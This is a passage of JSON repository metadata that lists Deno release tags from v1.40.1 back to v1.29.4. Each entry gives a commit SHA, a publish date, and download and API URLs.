1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b